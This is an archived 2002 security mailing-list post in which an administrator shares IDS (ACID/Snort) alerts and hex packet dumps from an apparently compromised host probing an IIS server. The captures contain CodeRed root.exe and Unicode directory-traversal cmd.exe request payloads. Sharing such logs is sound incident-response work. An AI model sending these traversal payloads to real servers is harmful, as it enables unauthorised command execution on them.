OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Jeremy Junginger (jjungingerinteractcommerce.com)
Date: Fri Jun 28 2002 - 12:25:34 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I just wanted to share. It appears to be a compromised host. Any
    thoughts?

    Generated by ACID v0.9.6b21 on Fri June 28, 2002 10:16:08

    ------------------------------------------------------------------------
    ------
    #(1 - 8203) [2002-06-28 07:52:05]
    [url/www.cert.org/advisories/CA-2001-19.html] WEB-IIS CodeRed v2
    root.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=112 ID=64072 flags=0 offset=0 TTL=107
    chksum=5814
    TCP: port=4162 -> dport: 80 flags=***AP*** seq=1758262495
          ack=3285962122 off=5 res=0 win=17520 urp=0 chksum=36882
    Payload: length = 72

    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
    010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
    020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www
    030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c
    040 : 6C 6F 73 65 0D 0A 0D 0A lose....
    ------------------------------------------------------------------------
    ------
    #(1 - 8204) [2002-06-28 07:52:06] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=120 ID=64169 flags=0 offset=0 TTL=107
    chksum=5709
    TCP: port=4193 -> dport: 80 flags=***AP*** seq=1759864606
          ack=3286219316 off=5 res=0 win=17520 urp=0 chksum=63927
    Payload: length = 80

    000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
    010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
    020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
    030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost:
    <www..Connne>
    040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
    ------------------------------------------------------------------------
    ------
    #(1 - 8205) [2002-06-28 07:52:06] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=120 ID=64219 flags=0 offset=0 TTL=107
    chksum=5659
    TCP: port=4208 -> dport: 80 flags=***AP*** seq=1760722868
          ack=3286352844 off=5 res=0 win=17520 urp=0 chksum=55146
    Payload: length = 80

    000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
    010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
    020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
    030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost:
    <www..Connne>
    040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
    ------------------------------------------------------------------------
    ------
    #(1 - 8206) [2002-06-28 07:52:06] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=136 ID=64274 flags=0 offset=0 TTL=107
    chksum=5588
    TCP: port=4230 -> dport: 80 flags=***AP*** seq=1761911317
          ack=3286485480 off=5 res=0 win=17520 urp=0 chksum=31284
    Payload: length = 94

    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
    010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
    030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
    040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost:
    <www..Connne>
    050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
    ------------------------------------------------------------------------
    ------
    #(1 - 8207) [2002-06-28 07:52:06] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=157 ID=64304 flags=0 offset=0 TTL=107
    chksum=5537
    TCP: port=4241 -> dport: 80 flags=***AP*** seq=1762498299
          ack=3286554292 off=5 res=0 win=17520 urp=0 chksum=48821
    Payload: length = 111

    000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
    010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
    020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
    030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
    040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
    050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host:
    <www..C>
    060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo
    ------------------------------------------------------------------------
    ------
    #(1 - 8208) [2002-06-28 07:52:07] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=157 ID=64336 flags=0 offset=0 TTL=107
    chksum=5505
    TCP: port=4245 -> dport: 80 flags=***AP*** seq=1762733150
          ack=3286642898 off=5 res=0 win=17520 urp=0 chksum=54330
    Payload: length = 111

    000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/..
    010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
    020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
    030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
    040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
    050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host:
    <www..C>
    060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo
    ------------------------------------------------------------------------
    ------
    #(1 - 8209) [2002-06-28 07:52:07] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=185 ID=64393 flags=0 offset=0 TTL=107
    chksum=5420
    TCP: port=4266 -> dport: 80 flags=***AP*** seq=1763771120
          ack=3286783288 off=5 res=0 win=17520 urp=0 chksum=31957
    Payload: length = 127

    000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c
    010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c
    020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E /..55../..c1../.
    030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ./.../winnt/syst
    040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
    050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F dir 32/cmd.exe?/
    060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
    070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E Host:
    <www..Conn>
    ------------------------------------------------------------------------
    ------
    #(1 - 8210) [2002-06-28 07:52:07] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=137 ID=64445 flags=0 offset=0 TTL=107
    chksum=5416
    TCP: port=4282 -> dport: 80 flags=***AP*** seq=1764599933
          ack=3286923590 off=5 res=0 win=17520 urp=0 chksum=20527
    Payload: length = 93

    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
    030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
    040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host:
    <www..Connn>
    050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close
    ------------------------------------------------------------------------
    ------
    #(1 - 8211) [2002-06-28 07:52:07] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=137 ID=64576 flags=0 offset=0 TTL=107
    chksum=5285
    TCP: port=4296 -> dport: 80 flags=***AP*** seq=1765284633
          ack=3287017192 off=5 res=0 win=17520 urp=0 chksum=27863
    Payload: length = 93

    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
    030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
    040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host:
    <www..Connn>
    050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close
    ------------------------------------------------------------------------
    ------
    #(1 - 8212) [2002-06-28 07:52:08] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=137 ID=64681 flags=0 offset=0 TTL=107
    chksum=5180
    TCP: port=4317 -> dport: 80 flags=***AP*** seq=1766573669
          ack=3287133452 off=5 res=0 win=17520 urp=0 chksum=64269
    Payload: length = 93

    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
    030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
    040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host:
    <www..Connn>
    050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close
    ------------------------------------------------------------------------
    ------
    #(1 - 8213) [2002-06-28 07:52:08] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=137 ID=64745 flags=0 offset=0 TTL=107
    chksum=5116
    TCP: port=4343 -> dport: 80 flags=***AP*** seq=1768029370
          ack=3287264240 off=5 res=0 win=17520 urp=0 chksum=51401
    Payload: length = 93

    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
    030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
    040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host:
    <www..Connn>
    050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close
    ------------------------------------------------------------------------
    ------
    #(1 - 8214) [2002-06-28 07:52:08] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=138 ID=64793 flags=0 offset=0 TTL=107
    chksum=5067
    TCP: port=4360 -> dport: 80 flags=***AP*** seq=1768931344
          ack=3287372593 off=5 res=0 win=17520 urp=0 chksum=43264
    Payload: length = 94

    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
    010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
    030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D ir dir HTTP/1.0.
    040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host:
    <www..Conn>
    050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nection: close
    ------------------------------------------------------------------------
    ------
    #(1 - 8215) [2002-06-28 07:52:09] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=136 ID=64832 flags=0 offset=0 TTL=107
    chksum=5030
    TCP: port=4371 -> dport: 80 flags=***AP*** seq=1769565695
          ack=3287454509 off=5 res=0 win=17520 urp=0 chksum=61686
    Payload: length = 94

    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
    010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
    030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
    040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost:
    <www..Connne>
    050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
    ------------------------------------------------------------------------
    ------
    #(1 - 8216) [2002-06-28 07:52:09] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=140 ID=64855 flags=0 offset=0 TTL=107
    chksum=5003
    TCP: port=4383 -> dport: 80 flags=***AP*** seq=1770136512
          ack=3287543887 off=5 res=0 win=17520 urp=0 chksum=30159
    Payload: length = 94

    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
    010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
    030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E ir c+dir HTTP/1.
    040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host:
    <www..Co>
    050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F nnnection: clo
    ------------------------------------------------------------------------
    ------
    #(1 - 8217) [2002-06-28 07:52:09] WEB-IIS cmd.exe access
    IPv4: 63.225.18.129 -> x.x.x.23
          hlen=5 TOS=0 dlen=136 ID=64887 flags=0 offset=0 TTL=107
    chksum=4975
    TCP: port=4394 -> dport: 80 flags=***AP*** seq=1770745706
          ack=3287647877 off=5 res=0 win=17520 urp=0 chksum=61954
    Payload: length = 94

    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
    010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 2f../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
    030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
    040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost:
    <www..Connne>
    050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..


    • application/x-pkcs7-signature attachment: smime.p7s